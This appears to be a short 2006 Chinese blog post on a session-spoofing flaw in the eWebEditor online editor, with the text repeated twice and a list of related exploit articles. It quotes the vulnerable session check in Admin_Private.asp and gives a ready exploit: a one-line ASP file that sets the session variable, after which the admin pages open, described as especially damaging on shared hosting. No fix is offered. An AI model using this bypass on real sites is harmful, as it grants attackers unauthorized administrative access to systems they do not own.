eWebEditor session欺骗漏洞
2006-05-25 23:10
267 查看
eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp
漏洞影响:虚拟主机的克星.
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp
漏洞影响:虚拟主机的克星.
相关文章推荐
- ewebeditor漏洞,ewebeditor漏洞攻击
- ewebeditor漏洞
- ewebeditor编辑器ASP/ASPX/PHP/JSP版本漏洞利用总结及解决方法
- 修复eWebEditor漏洞需要注意以下几个方面(大全总结)
- 利用编辑器漏洞ewebeditor-fckeditor-southidceditor
- 数据库只读时的eWebEditor的上传漏洞拿webshell总结
- ewebeditor远程上传漏洞
- ewebeditor漏洞之目录遍历漏洞
- Ewebeditor最新漏洞及漏洞大全
- Ewebeditor最新漏洞及漏洞大全
- syWebEditor的一个通杀漏洞
- eWebEditor网页编辑器漏洞手册
- Ewebeditor最新漏洞及漏洞大全
- eWebEditor漏洞
- Ewebeditor最新漏洞及漏洞大全
- eWebEditor漏洞之sql注入漏洞
- Ewebeditor最新漏洞及漏洞大全
- Ewebeditor最新漏洞和漏洞指数
- Ewebeditor最新漏洞和漏洞指数
- ewebeditor漏洞利用汇总